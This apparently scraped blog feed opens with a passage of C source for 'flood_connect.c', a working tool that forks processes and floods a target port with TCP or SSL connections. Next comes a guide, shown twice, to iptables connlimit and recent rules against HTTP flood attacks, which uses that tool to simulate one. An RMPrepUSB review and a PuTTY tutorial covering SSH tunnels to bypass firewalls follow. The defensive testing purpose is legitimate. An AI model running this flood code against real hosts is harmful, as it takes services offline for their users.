                          fprintf(stderr, "Error: port must be between 1 and 65535\n");  
                          exit(-1);  
                      }  
                      port = atoi(optarg) % 65536;  
                      break;  
            default: fprintf(stderr,"Error: unknown option -%c\n", i); help();  
        }  
    }  
 
    if (optind + 1 != argc) {  
        fprintf(stderr, "Error: target missing or too many commandline options!\n");  
        exit(-1);  
    }  
 
    if (infile != NULL) {  
        if ((f = fopen(infile, "r")) == NULL) {  
            fprintf(stderr, "Error: can not find file %s\n", infile);  
            exit(-1);  
        }  
        fstat(fileno(f), &st);  
        str_len = (int) st.st_size;  
        str = malloc(str_len);  
        fread(str, str_len, 1, f);  
        fclose(f);  
    }  
 
    if ((resolv = gethostbyname(argv[argc-1])) == NULL) {  
        fprintf(stderr, "Error: can not resolve target\n");  
        exit(-1);  
    }  
    memset(&target, 0, sizeof(target));  
    memcpy(&target.sin_addr.s_addr, resolv->h_addr, 4);  
    target.sin_port = htons(port);  
    target.sin_family = AF_INET;  
 
    if (connect_delay > 0)  
        connect_delay = connect_delay * 1000; /* ms to microseconds */ 
    else 
        connect_delay = 1;  
    if (close_delay > 0)  
        close_delay = close_delay * 1000; /* ms to microseconds */ 
    else 
        close_delay = 1;  
    if (dump_delay > 0)  
        dump_delay = dump_delay * 1000; /* ms to microseconds */ 
    else 
        dump_delay = 1;  
 
    rlim.rlim_cur = RLIM_INFINITY;  
    rlim.rlim_max = RLIM_INFINITY;  
    ret = setrlimit(RLIMIT_NOFILE, &rlim);  
    if (verbose) {  
        if (ret == 0)  
            printf("setrlimit for unlimited filedescriptors succeeded.\n");  
        else 
            printf("setrlimit for unlimited filedescriptors failed.\n");  
    }  
 
    for (i = 3; i < 4096; i++)  
        close(i);  
 
    printf("Starting flood connect attack on %s port %d\n", inet_ntoa((struct in_addr)target.sin_addr), port);  
    (void) setvbuf(stdout, NULL, _IONBF, 0);  
    if (verbose)  
        printf("Writing a \".\" for every 100 connect attempts\n");  
 
    ret = 0;  
    count = 0;  
    successful = 0;  
    i = 1;  
    s = -1;  
    res = 1;  
 
    while(pidcount < forks && res) {  
        res = pids[pidcount] = fork();  
        pidcount++;  
    }  
 
    if (res == 0)  
        client = 1;  
          
    if (res > 0) {  
        signal(SIGTERM, kill_children);  
        signal(SIGINT, kill_children);  
        signal(SIGSEGV, kill_children);  
        signal(SIGHUP, kill_children);  
    }  
 
    if (use_ssl) {  
#ifdef OPENSSL  
        SSL_load_error_strings();  
        SSLeay_add_ssl_algorithms();  
 
        // context: ssl2 + ssl3 is allowed, whatever the server demands  
        if ((sslContext = SSL_CTX_new(SSLv23_method())) == NULL) {  
            if (verbose) {  
                err = ERR_get_error();  
                fprintf(stderr, "SSL: Error allocating context: %s\n", ERR_error_string(err, NULL));  
            }  
            res = -1;  
        }  
 
        // set the compatbility mode  
        SSL_CTX_set_options(sslContext, SSL_OP_ALL);  
 
        // we set the default verifiers and dont care for the results  
        (void) SSL_CTX_set_default_verify_paths(sslContext);  
        SSL_CTX_set_tmp_rsa_callback(sslContext, ssl_temp_rsa_cb);  
        SSL_CTX_set_verify(sslContext, SSL_VERIFY_NONE, NULL);  
#endif  
    }  
 
    while (count < max_connects || max_connects == UNLIMITED) {  
        if (ret >= 0) {  
            if ((s = socket(AF_INET, sock_type, sock_protocol)) < 0) {  
                if (verbose && warn == 0) {  
                    perror("Warning (socket)");  
                    warn = 1;  
                }  
                if (exit_on_sock_error)  
                    exit(0);  
            } else {  
               setsockopt(s, SOL_SOCKET, SO_REUSEADDR, &i, sizeof(i));  
            }  
        }  
        if (s >= 0) {  
            ret = connect(s, (struct sockaddr *)&target, sizeof(target));  
            if (use_ssl && ret >= 0) {  
#ifdef OPENSSL  
                if ((ssl = SSL_new(sslContext)) == NULL) {  
                    if (verbose) {  
                        err = ERR_get_error();  
                        fprintf(stderr, "Error preparing an SSL context: %s\n", ERR_error_string(err, NULL));  
                    }  
                    ret = -1;  
                } else 
                    SSL_set_fd(ssl, s);  
                if (ret >= 0 && SSL_connect(ssl) <= 0) {  
                    printf("ERROR %d\n", SSL_connect(ssl));  
                    if (verbose) {  
                        err = ERR_get_error();  
                        fprintf(stderr, "Could not create an SSL session: %s\n", ERR_error_string(err, NULL));  
                    }  
                    ret = -1;  
                }  
 
                if (debug)  
                    fprintf(stderr, "SSL negotiated cipher: %s\n", SSL_get_cipher(ssl));  
#endif  
            }  
            count++;  
            if (ret >= 0) {  
                successful++;  
                warn = 0;  
                if (str_len > 0) {  
                    if (use_ssl) {  
#ifdef OPENSSL  
                        SSL_write(ssl, str, str_len);  
#endif  
                    } else {  
                    setsockopt(s, SOL_SOCKET, SO_REUSEADDR, &i, sizeof(i));  
                        if (setsockopt(s, SOL_TCP, TCP_NODELAY, &i, sizeof(i)) != 0)  
                            perror("Warning (setsockopt SOL_TCP)");  
                        write(s, str, str_len);  
                    }  
                }  
                if (dump) {  
                    fcntl(s, F_SETFL, O_NONBLOCK);  
                    if (dump_delay > 0)  
                        usleep(dump_delay);  
                    if (use_ssl) {  
#ifdef OPENSSL  
                        reads = SSL_read(ssl, buf, sizeof(buf));  
#endif  
                    } else {  
                        reads = read(s, buf, sizeof(buf));  
                    }  
                    if (reads > 0)  
                        printf("DATA: %s\n", buf);  
                }  
                if (close_connection) {  
                    if (close_delay > 0)  
                        usleep(close_delay);  
#ifdef OPENSSL  
                    if (use_ssl && close_connection == 1)  
                        SSL_shutdown(ssl);  
#endif  
                    close(s);  
#ifdef OPENSSL  
                    if (use_ssl && close_connection > 1)  
                        SSL_shutdown(ssl);  
#endif  
                }  
                if (connect_delay > 0)  
                    usleep(connect_delay);  
            } else {  
                if (verbose && warn == 0) {  
                    perror("Warning (connect)");  
                    warn = 1;  
                }  
                if (exit_on_sock_error)  
                    exit(0);  
            }  
            if (verbose)  
                if (count % 100 == 0)  
                    printf(".");  
        } else 
            close(s);  
    }  
    if (client) {  
        while (1) {}  
    } else {  
        if (verbose)  
            printf("\n");  
        printf("Done (made %s%ld successful connects)\n", forks ? "approx. " : "", successful + successful * forks);  
        if (keep_alive && close_connection == 0) {  
            printf("Press <ENTER> to terminate connections and this program\n");  
            (void) getc(stdin);  
        }  
      
    if (forks > 0) {  
        usleep(1 + connect_delay + dump_delay + close_delay);  
            while (i < forks) {  
                kill(pids[i], SIGTERM);  
                i++;  
            }  
        usleep(10000);  
        i = 0;  
            while (i < forks) {  
                kill(pids[i], SIGKILL);  
                i++;  
            }  
        }  
    }  
    return 0;  
}

（2）查看效果：

使用

watch 'netstat -an | grep:21 | \ grep<模拟攻击客户机的IP>| wc -l'

实时查看模拟攻击客户机建立起来的连接数，

使用

watch 'iptables -L -n -v | \grep<模拟攻击客户机的IP>'

查看模拟攻击客户机被 DROP 的数据包数。

5．注意

为了增强iptables防止CC攻击的能力，最好调整一下ipt_recent的参数如下：

#cat/etc/modprobe.conf options ipt_recent ip_list_tot=1000 ip_pkt_list_tot=60

#记录1000个IP地址，每个地址记录60个数据包 #modprobe ipt_recent
当apache站点受到严重的cc攻击，我们可以用iptables来防止web服务器被CC攻击，实现自动屏蔽IP的功能。
1．系统要求

(1)LINUX 内核版本：2.6.9-42ELsmp或2.6.9-55ELsmp（其它内核版本需要重新编译内核，比较麻烦，但是也是可以实现的）。

(2)iptables版本：1.3.7

2. 安装

安装iptables1.3.7和系统内核版本对应的内核模块kernel-smp-modules-connlimit

3. 配置相应的iptables规则

示例如下：

(1)控制单个IP的最大并发连接数

iptables -I INPUT -p tcp --dport 80 -m connlimit --connlimit-above 50 -j REJECT

#允许单个IP的最大连接数为 30

(2)控制单个IP在一定的时间（比如60秒）内允许新建立的连接数

iptables -A INPUT -p tcp --dport 80 -m recent --name BAD_HTTP_ACCESS --update --seconds 60 --hitcount 30 -j REJECT iptables -A INPUT -p tcp --dport 80 -m recent --name BAD_HTTP_ACCESS --set -j ACCEPT

#单个IP在60秒内只允许最多新建30个连接

4. 验证

（1）工具：flood_connect.c（用来模拟攻击)

（2）查看效果：

使用

watch 'netstat -an | grep:21 | \ grep<模拟攻击客户机的IP>| wc -l'

实时查看模拟攻击客户机建立起来的连接数，

使用

watch 'iptables -L -n -v | grep<模拟攻击客户机的IP>'

查看模拟攻击客户机被 DROP 的数据包数。

5．注意

为了增强iptables防止CC攻击的能力，最好调整一下ipt_recent的参数如下：

#cat/etc/modprobe.conf options ipt_recent ip_list_tot=1000 ip_pkt_list_tot=60

#记录1000个IP地址，每个地址记录60个数据包 #modprobe ipt_recent

Create Bootable Windows or Linux USB with RMPrepUSB

shanyiwan@live.com() — Wed, 30 Nov 2011 01:56:25 GMT

Of the various applications for creating bootable Windows or Linux drives, RMPrepUSB offers some unique features which may be appealing to many users. Advanced users can set specific parameters for the drive if necessary. New and inexperienced users can easily use this application as well. Unlike other similar applications RMPrepUSB has additional features that stand out. There are options for USB formatting in several file systems such as FAT16, FAT32 and NTFS formats. You are able to run a USB speed test, size/speed test, install Grub4dos, SYSLINUX, and even create AXT2 FS on any USB drive. This is much more convenient than creating bootable disks on CD or DVD, as pen drives are much easier to keep track of and less prone to damage.

This application is completely free with no catch and you don’t end up with a dozen different toolbars in your browsers or applications that you don’t want. The download is free of advertizing and so is the installation. You get a quick download in a .zip file and then simply double-click the .exe file to start the installation. This application does not open automatically after installation, but does offer a desktop icon for easy access. You can download RMPrepUSB from this link: http://www.rmprepusb.tk/

The interface is straightforward and fairly self explanatory. If you want an instructional manual, there is one available at the link provided, though you might have to search around a bit. The site gets changed often and updated versions are consistently released. It is best to use the latest version.

In order to create a bootable USB, first do the obvious and insert a blank USB drive into your computer. Using this application is so basic and easy that anyone can do it (yes, really). The interface displays a list of bootloader options to choose from. By default, the Image Tools setting is set for File to USB.

The File to USB option reads the image file content then writes to the selected drive. Only binary images will work and they cannot be compressed. The USB to File option reads file content and then writes it to an image file. With either option, supported image formats are IMG, ROM, BIN, RAW, BMDK, VDI, RAM, QCOW, QCOW2, CLOOP, DMG, VPC, VHD, VVFAT, and NBD. File Info option is included so that you can obtain file information.

Select the desired bootloader and then choose a file formatting system in the field just below the BOOT TYPE list.

If the USB that you are using has any files or portable applications on it, they will be erased once you create the bootable USB. That is why using a blank USB drive is emphasized. RMPrepUSB automatically formats the drive and, as we all know, formatting erases all data.

Once you have selected the format and the bootloader, all you need to do is click Prepare Drive at the bottom pane. This will initiate the process to create the bootable USB for the selected operating system. You will see a warning stating that all data will be erased and it will ask if it is OK to do so and create a new partition.

Click OK and the application process will start. When finished, it will show that the bootable USB was created. If you want to test it, there is a Test button in the right pane. The only catch is that testing also erases the USB and you have to start over, but it is good to do this to ensure that it is working properly.

Once tested successfully, start over and then you have your bootable USB.

PuTTY 中文教程

shanyiwan@live.com() — Thu, 29 Sep 2011 02:11:40 GMT

序言

懒，是一个优点，有些时候还是要学一学才能会了的。

—— 柴锋（1979- ）

我的这些文字是从这几年来的 PuTTY 使用经验中慢慢得来的，也不仅仅是介绍 PuTTY，还包括了一些相关的软件，比如：优秀的 FTP 工具 FileZilla、功能强大的 SFTP 客户端 WinSCP。

杂七杂八的乱说了一些，这里把大致内容罗列如下：

最简单的使用，登录 SSH 主机
中文乱码的处理
PuTTY 常用配置的说明
- 复制、粘贴
- 保存会话
- 注销
- 自动登录用户名
- 自动设置环境变量
- 设置代理服务器
- 自动执行命令
- 备份、删除 PuTTY 的设置
PuTTY 的 X11 转发
如何用 PuTTY 建立 SSH 隧道
如何用 PuTTY 建立反向的 SSH 隧道，像个特洛伊木马一样突破防火墙
把 PuTTY 作为一个安全的代理服务器
- 安全的上网不被嗅探
- 避免 MSN 等聊天工具被监听
怎样用 PSCP、PSFTP 安全的传输文件
- 功能强大的 SFTP 客户端 WinSCP
用 PuTTYgen 生成密钥，登录 SSH 主机不再需要口令
Pagent 代理密钥，每次开机只需要输入一次密钥口令
Plink 简单而又迅速的执行 SSH 主机上的程序
常见问题

除了上面的这些，还夹杂了一些 PuTTY 使用上的技巧、服务器配置的一些安全建议。说起来这是一些有关 PuTTY 的使用教程，其实也就是 SSH 的参考教程，绝大多数的内容在其他系统或软件上也都是一样的。不同的是参数、配置、命令行之类的，只要会了一个，其他也就触类旁通了。

一些基本知识

如果你已经知道 SSH、Telnet、Rlogin 这是什么，就跳过这一部分，看下面的吧。

(以后补充，暂时空下)

简介

PuTTY 的官方网站：http://www.chiark.greenend.org.uk/~sgtatham/putty/，截止到 ~~2006年11月，发布的最高稳定版本是 0.58 2007年6月，发布的最高稳定版本是 0.6。~~2011年7月12日，发布最新的稳定版本 0.61。

PuTTY 是一个跨平台的远程登录工具，包含了一组程序，包括：

PuTTY (Telnet 和 SSH 客户端)
PSCP (SCP 客户端, 命令行下通过 SSH 拷贝文件，类似于 Unix/Linux 下的 scp 命令)
PSFTP (SFTP 的命令行客户端，类似于 FTP 的文件传输，只不过使用的是 SSH 的 22 端口，而非 FTP 的 21 端口，类似于 Unix/Linux 下的 sftp 命令)
PuTTYtel (仅仅是一个 Telnet 客户端)
Plink (命令行工具，执行远程服务器上的命令)
Pageant (PuTTY、PSCP、Plink 的 SSH 认证代理，用这个可以不用每次都输入口令了)
PuTTYgen (用来生成 RSA 和 DSA 密钥的工具).

虽然包含了这么多，但平时经常见到只是用 PuTTY 登录服务器，完全没有发挥出 PuTTY 的强大功能。
PuTTY 作为一个组件也存在于很多的软件中，比如 FileZilla、WinSCP
在后面的文字中，如非特别说明，默认的登录的协议是 SSH。毕竟用 PuTTY 主要就是登录 SSH 主机，用 Telnet、RLogin 没法体现出 PuTTY 的强大功能。

安装

下载页面在这里：http://www.chiark.greenend.org.uk/~sgtatham/putty/download.html
PuTTY 需要安装么？需要么？需要么？真的需要么？不需要。PuTTY 是一个准绿色软件，说它绿色是因为直接就能使用，完全没有任何的安装程序。准绿色是指 PuTTY 的所有配置都保存到了注册表，如果不记得备份注册表中的相关内容，下次重装机器所有配置就没了，而且配置也不方便用闪存盘随身携带。但是 PuTTY 的配置删除还是蛮方便的，运行时指定个参数 -cleanup 就可以清除 PuTTY 的所有配置信息。

第一印象，开始登录一台远程主机

运行 PuTTY 就可以看到下面这个界面

在这里输入服务器的 IP 或主机名，选择好登录协议，还有协议的端口，如果希望把这次的输入保存起来，以后就不需要再重新输入了，就在第4步输入好会话保存的名称，比如：mail-server，或者干脆就是主机的地址，点击保存就可以了。

最后点下面的 Open 按钮，输入正确的用户名和口令，就可以登录服务器了。

首次登录一台主机时

第一次登录时，会看到这个对话框

这是要告诉你登录的主机密钥指纹，点 Yes 就保存起来，以后就不会再弹出这个窗口，然后就正常登录。点 No 不保存，下次还是要提示你，然后也可以正常登录。如果一台主机我们只是临时登录一下，当然就是点 No 了。Cancel 就是取消，也就是取消了这次登录。
如果你曾经登录过这台主机，但是又弹出来这个对话框，可能有以下几种情形：

主机重新安装了操作系统
这台主机可能有多个IP，这次用的是另外一个 IP
有其他不怀好意的主机来冒充，诱骗我们登录，窃取隐秘信息

前两个情形很常见，一般点 Yes 就行了。后面这个嘛……唔……唔……，点 No/Cancel，再去询问相关的主机管理人员。

又看到了中文乱码

成功登录主机后，输入命令，这……这……显示，又是乱码。唉，中文乱码是一个老生常谈的问题，提起来就头大。原因嘛，不外乎字符集、终端编码之类的，还是可以解决的。

PuTTY 的默认字体和字符集并不适合中文显示，在窗口标题上点击右键，选择 Change Settings...

在打开的配置窗口左边选择 Appearance，在右边点 Font settings 里面的 Change 按钮，选择好中文字体，比如：宋体、新宋体之类的

字体选择好了，还要确定字符集。
选择配置窗口左边的 Translation，在右边的 Received data assumed to be in which character set 下拉列表中选择最后一个“Use font encoding”，最后点下面的 Apply 按钮就生效了。

重新执行命令 ls -l，就可以正常看到中文了

怎么还是乱码？

如果还是乱码的话，就执行以下命令，看看系统的字符集
echo $LANG $LANGUAGE

哦，原来系统的字符集是 UTF-8 呀。重新返回上面选择字符集的那一步，选择配置窗口左边的 Translation，在右边的 Received data assumed to be in which character set 下拉列表中选择“UTF-8”

这下99%的情形下，汉字是不会有乱码了。最后，总之一下 PuTTY 中乱码的解决办法：
先看看系统的字符集，如果是 UTF-8 的，那就简单了，选择好中文字体，然后编码选择 UTF-8 就行了。
如果编码是 GB2312、GBK、GB18030，当然也包括 BIG5这些，在 PuTTY 的编码选择中看不到这些编码，那就选择最后一个“Use font encoding”，绝大部分情况下这样就没啥问题了，反正我是没碰到有什么例外的情况。
现在的 Linux 如果默认语言选择为中文，默认的编码就是 UTF-8 了。以前安装 Redhat AS 3 时，语言选择为中文，默认的编码是 zh_CN.gb2312, zh_CN.gb18030，好像从 AS 3 update 6 开始，包括现在的 AS4、AS5，中文的默认编码都成了 zh_CN.utf8。至于 Debian、Ubuntu 等等这些上面，好像一直都是 UTF-8。
至于是使用 UTF-8呢，还是用 GB2312、GBK 或者 GB18030呢？我个人还是倾向于 UTF-8。毕竟我们使用的大多数软件都是国外的，处理中文编码多多少少有些问题，PuTTY 自然也不例外。
下面的这个图上，我把终端编码修改为 zh_CN.utf8，然后也按照前面的所说的方法把 PuTTY 的字符集修改为 UTF-8。然后在终端中输入汉字“柴锋”，按左方向键，可以看到汉字显示很正常。

我重新把终端的编码修改为 zh_CN.gb2312，同样的，把 PuTTY 的字符集修改为最后一个“Use font encoding”。还是在终端上输入汉字“柴锋”，按下左方向键以后，会看到汉字乱码了。

至于用哪个编码，主要还是看领导的决定了，我们的领导就喜欢 GBK，连 GB18030 都不行。以前在用 Debian 的时候，好像默认都不支持 GBK 编码。这几年公司的开发在汉字编码问题上出过几次麻烦，还不就是在 ISO8859-1, GB2312/GBK/GB18030和UTF-8上折腾来折腾去。
给大家看一张 emacs 的截图，看看上面的这么多语言的文字共同显示，这个会是用 GB2312/GBK/GB18030 的编码么？

用 UTF-8 也不是为了要在一个屏幕上显示好几种不认识的文字，也不一定非要是跟国际接轨弄个外包给老外开发程序做个其他语言的界面让老外用，起码不要在那么多编码里折腾了，顶多两个 ISO8859-1 和 UTF-8。发发牢骚，下面继续……

在 PuTTY 里面怎样选中，复制和粘贴？

在 PuTTY 的窗口里面复制、粘贴可不能用 Windows 里的这些 Ctrl+C, Ctrl+Ins, Ctrl+V 这些快捷键，Ctrl+C 在控制台上可是终止当前的命令执行。
PuTTY 的选择、复制、粘贴这些操作都是通过鼠标来完成的。
在 Window-〉Selection 这里可以设置复制和粘贴的方式。

默认的 Action of mouse buttons （鼠标按键的功能）的选项是 Compromise，这种方式下选中有两种方式，一是直接用鼠标左键拖拉选中就可以了，二是用鼠标中键单击选中区域的开头，用滚动条拖拉到期望选中区域的末尾，再用鼠标中键单击，就可以选中了。
选中以后，单击鼠标左键就把选中部分复制到剪贴板了。粘贴也很简单，单击鼠标右键。
Action of mouse buttons 的第一个选项是 Windows （Windows 方式的），鼠标中键的操作跟前面提到的一样。右键不是粘贴了，而是打开了右键菜单。

其实这个右键菜单在标题栏上点击，也都可以看得到。

第三个选项是 xterm （xterm 方式），这个跟默认的 Compromise 方式相反的，中键和右键的操作调换了一下，就不多说了。
下面那个 Shift overrides application's use of mouse 是和 Shift 键有关的。有些 Rogue Like 的程序，比如 mc、links、Lynx、VIM 等等，都支持鼠标操作，想在用鼠标在上面选择或粘贴就不行了。这个选项默认是选中的，在支持鼠标操作的 Rogue Like 界面下，按住 Shift 键，就可以像前面的那样用鼠标来选择、复制、粘贴了。
看下面的这个图片，用 Links 打开了 Google 的首页，用鼠标去选中顶部中间的 Google，我们会发现，弹出了保存的对话框。

按住 Shift 键重新操作一次，哈哈，这次选中了。

在 Control use of mouse 里面还有个 Default selection mode （默认的选择模式），默认是 Normal，就像文字处理工具里这样的选择

另外一个是 Rectangular block（块选择方式），至于用哪种方式就看自己的选择了。

实时保存会话

这次更改配置参数了，关闭窗口后，下次使用还是要重新选择的，麻烦。
还是回到上面修改配置的哪个地方，选择左边的 Session，在右边选择要覆盖的会话名称，或者重新输入一个新的名称，点击 Save 按钮保存。

关于注销登录的一些事情

成功登录主机后，也能正常看到中文了。这样，我们就可以完成大部分的工作。最后要关闭窗口了，该怎么办呢？我见过很多人，包括我们公司负责专职维护的同事，都是直接点击窗口上的关闭按钮，完全没有理会弹出警告窗口，直接点击了 Yes。

这样做是不对的，首先这不是正确的注销方式，应该输入命令 exit 来正常注销；其次直接关闭窗口后，你的登录其实还在服务器上，如果一连多次的这样强制关闭窗口，用命令 w 或者 who 命令查看时，可以看到很多的用户还在系统上登录，占用了系统的资源。最重要的是，你的这次登录可能只是为了启动一下 WebLogic 或者其他什么应用服务器，直接关闭窗口后，可能会导致你的业务在随后的几分钟内也被终止，这应该不是你所希望看到的吧。
如果上述的理由是每次要输入 exit 然后回车，比较麻烦。你可以用快捷键 Ctrl+d 来注销登录，一般情况下，快捷键一按窗口都直接关闭了，还省了两次鼠标点击。
在前面说道保存会话时，大家或许也注意到，下面有个 Close window on exit 有三个选项：

Always （不管怎样，窗口总是要关闭的）
Never （无论是否有程序还在运行，都不要关闭窗口）
Only on clear exit （这个是默认选中的，只有在本次登录中运行的程序都正常终止或者在后台运行，窗口才关闭）

有的程序在执行时，虽然在命令最后面加上 “&”就能放到后台运行。但是正常注销登录后，窗口没有被自动关闭，还能看到程序的输出，这时强制关闭窗口还是可以的。为了避免这种情形，可以使用 nohup 命令。
用法嘛就是： nohup 命令命令参数，这样就可以了。

窗口保存的输出有点少，前面的都看不到了

执行了一个命令，输出了好多东西，但是默认的配置下，PuTTY只保存了最后200行的内容，满足不了我们的需求。
还是在标题栏上点右键选择 Change settings...，在配置窗口的左边选择 Window，修改右边的 Lines of scrollback，改大点，比如 20000、80000的

在上面的 Set the size of the window 里设置的是窗口显示的行数和列数，默认是 24 行、80 列，根据自己的需要来修改吧。
When window is resized 这个选项配置的是，当窗口大小发生改变时该采取什么动作。

Change the number of rows and columns（这个是默认的，改变窗口大小时，自动修改行数和列数）
Change the size of the font（这个是根据窗口的大小来修改字体的大小，窗口最大化的时候，字都是很大的）
Change font size only when maximised（只有在窗口最大化的时候才改变字体大小）
Forbid resizing completely（完全禁止改变窗口大小，一了百了）

在现代的 Unix/Linux 主机上，默认选项已经不存在任何问题了。如果是 Solaris 8 这样的老式 Unix 上最好用第2或第4个选项。
第3个选项嘛，要求你的屏幕不是宽屏的，选中这个选项以后，大家可以先把窗口往窄的缩一下，然后最大化窗口，哈哈，满足一下不是宽屏的虚荣心。
顺便说一下，在 PuTTY 中的前后翻页，与 Linux 终端一样，用 Shift+PageUp/PageDown 来上下翻页，而 Ctrl+PageUp/PageDown 则是一行一行的。

新建一个会话时，还有些东西再啰嗦一下

前面把如何用 PuTTY 登录一台主机到注销的过程聊了一遍，但是在新建会话时还是有些东西需要再啰嗦一下的。

保持连接，不要自动断开

在 Connection 里面有个 Seconds between keepaliaves，这里就是每间隔指定的秒数，就给服务器发送一个空的数据包，来保持连接。以免登录的主机那边在长时间没接到数据后，会自动断开 SSH 的连接。
默认输入 0 是禁用保持连接，在这里我习惯的设置了 10。
下面的那两个复选框都保持默认选中吧。

自动登录用户

在 Connection-〉Data 里面有个 Auto-login username，可以指定默认的登录用户。如果每次登录主机都是用同一个用户，不妨在这里设置一下。SSH、Telnet、Rlogin 这三种协议都支持，但不是所有的 Telnet 服务器支持自动登录用户

自动设置环境变量

还是前面的那个界面，下面有个 Environment variables，在 Variable 输入环境变量的名称，Value里设置上环境变量的值，登录主机后就会自动设置上，但是这个不一定能用，有些主机为了安全，可能会禁用这个特性，一旦登录就会收到这样一个错误提示：

Server refused to set environment variables

设置代理服务器

这个经常用到，设置方法大同小异，注意选择好 Proxy type（代理服务器的类型）就可以了。
代理服务器的地址填写到 Proxy hostname 这里，Port 就是代理服务的端口（HTTP代理常用端口有 3128、8080，Socks5代理常用端口有 1080）
Exclude Hosts/IPs 这里是填写排除的主机地址和IP，有些地址不需要代理，就在这里填写。
有些代理需要认证，用户名填写到 Username，密码则填写到下面的 Password。

自动执行一个命令

在 Connection-〉SSH 里有个 Remote command，在这里面填写上远程服务器上的某个命令，比如：df，登录后就会自动执行。
我们在 Unix 上用 ssh 登录主机时用的命令 ssh，在 ssh 的最后面加上远程主机上的命令，就跟这个一样。
但是……，先别着急，一旦设置上这个选项，你会发现在登录成功后，窗口一下就关闭了，嘿，怎么啦？什么也没看见。
因为命令执行完毕的同时，本次 SSH 登录连接也随之关闭。

你可以把远程自动执行的命令修改成 sleep 10，然后重新登录，再看看效果。
登录成功后，没有出现命令提示符，10秒钟后，窗口自动关闭。这也验证了刚才我说的，命令执行完毕后，SSH 连接自动断开。
冰雪聪明的你一定会想到，如果每次登录主机，都是要重新启动一下 tomcat，那这里就可以填写上这样的命令：

export CATALINA_HOME="~/apache-tomcat-5.5.17";export JAVA_HOME="~/jdk1.5.0_07";export PATH=$JAVA_HOME/bin;$PATH ; cd $CATALINA_HOME/bin;./shutdown.sh;./startup.sh;tail -f $CATALINA_HOME/logs/catalina.out

（上面的命令是一行的哦）
先自动设置一下环境变量（前面有提到，服务器可能会禁用自动设置环境变量，为了保险起见，在这里设置了一下），然后进入 tomcat 的 bin 目录，用 shutdown.sh 停止 tomcat，然后再 startup.sh 启动 tomcat，最后 tail 命令持续观察 tomcat 的日志输出，不想看了，就直接 Ctrl+C 就可以终止 SSH 的会话了。
哈哈，是不是很方便？
不过前面提到的命令 sleep 10，只是建立了 SSH 连接，然后 10 秒钟后自动断开。是不是觉得很无聊没什么用途啊？其实这个命令配合后面提到的 Tunnels（隧道），可以自动保持隧道一定时间的开放，如果指定时间内（在这里就是 10 秒钟）隧道没有被使用，就自动关闭 SSH 连接和隧道。
如果选中了 Don't start a shell or command at all 就禁用了自动执行命令这一个特性，这个主要是配合 Tunnels （隧道）来使用的。因为有时候，我们只需要利用隧道建立一个 VPN，而并不需要登录上去执行命令。用这个方法建立好隧道以后，就一直开放了，除非自己手工关闭。

嗯，还有个问题哦，如果一次要执行的命令很多，该怎么办呢？嗯，给 PuTTY 用 -m 选项指定一个包含远程主机上执行的命令的文本文件。不过以后还会说到 Plink，就是专门做这个用的，慢慢来慢慢来。

数据自动压缩传输，变相的提高传输速率

还是前面的那个界面，Protocol options 里面有个 Enable compression，这个选项的意思就是传输时压缩数据，在连接速度不变的情况下，变相的提高了传输速率。一般的 SSH 服务器都会允许这个选项的，所以还是选中好了。

无需口令登录

在 Connection-〉SSH-〉Auth 这里面有两个需要了解的，以后在讲到 PuTTYGEN 和 Pagent 时会详细介绍的。
一个是 Allow agent forwarding，作用是允许私钥代理的转发。
另外一个是最下面的 Private key file for authentication，选择私钥认证文件。
这两个可以让你用 SSH 登录不用输入主机口令，但是私钥的口令还是需要输入的，如果使用了私钥代理 Pagent ，私钥口令也可以省略。再配合前面提到的自动指定用户名登录，可以实现自动登录主机。登录到主机上以后，用 SSH 登录另外一个同样配置了相同的私钥认证的主机，也可以不用再次输入口令。
这些可以大大减轻了我们的重复工作，不用单调枯燥的输入用户名和口令，但是这样使用有个后遗症就是如果主机密码没有在另外一个地方记录下来的话，这个密码很快会忘记的，好处嘛，密码可以设置的很长很变态 XD。

X11 转发能够让你在 Windows 上使用 Linux 的程序

这里很简单，选中 Enable X11 forwarding 后登录主机，记得在我们本地运行 X 服务端程序（比如：免费好用的 Xming）。

然后在控制台直接输入 X 环境下运行的程序，比如：xlogo，我们就可以看到 Linux 上的GUI界面的程序在Windows桌面上打开了。

运行个复杂的，比如 gnome-session，这个是 GNOME 的启动命令，如果想打开 KDE 就是 startkde

这样跟在本地使用 X Window 几乎是一样的了，而且还是运行在 Windows 的桌面上呢，骗骗小 mm 还是不错的。或许你会问这样用跟 vnc 那还不一样了？答案是，不一样。如果网络环境不好，还是用vnc吧，否则迟钝的图形响应速度会让你抓狂的。

打开了 GNOME 桌面，怎么关闭呢？点菜单的注销吧。如果你点了关机，这可关不了你的Windows，关的是远程主机。

用 SSH Tunnels（SSH 隧道），突破防火墙

哇哦，突破防火墙！是不是忽然有了做黑客的感觉呢？呀！子弹，我躲——，身子往后仰，继续闪……，噢，肚皮被子弹蹭了一下。
简单的说一下，SSH 协议能够通过已经建立好的 SSH 加密链路来转发任意的网络连接，从而避免了网络中的明文传输，也就无法用一些 Sniffer 工具嗅探到我们的隐秘信息了。
先说一下大致的使用过程，登录到主机上以后，就可以建立好一个 SSH 隧道，这时在你的机器本地会开放一个端口，通过本地的这个端口访问，就相当于在主机上去直接访问。很像代理服务器吧，如果隧道另一端的端口是动态的，SSH 隧道就是一个代理了，SSH 隧道的意思大致就是这个。通过 SSH 隧道，我们可以保证从我们这一段到主机那一端是安全的，不会被监听到。
说了这么多，实际演练演练就知道了。在 PuTTY 的 Connection-〉SSH-〉Tunnels 这里就是配置 SSH 隧道的。
Add new forwarded port 这里就是添加隧道转发端口的，其中 Source port 是隧道的源端口，也就是隧道的入口，连接隧道时要连接这个端口。Destination 这里是目的地，隧道的出口，输入的格式是： server:port。
还要说明的一点是 SSH 隧道是有方向的，这个方向是由下面的单选按钮 Local/Remote/Dynamic 来决定的。如果下面的单选按钮选中的是 Local，那么 Destination 这里填写的目标是相对于远程主机而言，而非你的机器。这样的隧道可以称之为正向隧道，隧道的入口是在你的本地，出口在远程主机那一端。如果单选按钮选中的是 Remote，那么目标地址就是相对与你的机器而言，而非远程主机。这样的隧道称之为反向隧道，隧道的入口是远程主机那一端，隧道的出口则是你的本地机器。这与 Local 选项是相反的。而最后一个 Dynamic 则不用指明 Destination 目标地址，也就是说目标地址是动态的了，连入隧道时可以随意指定目标地址，而不像 Local/Remote 指明的固定目标地址，所以这样的隧道就成了变相的加密 socks5 代理服务器了。
看明白了么？是不是会有些糊涂？后面我会举个例子来详细说说的。

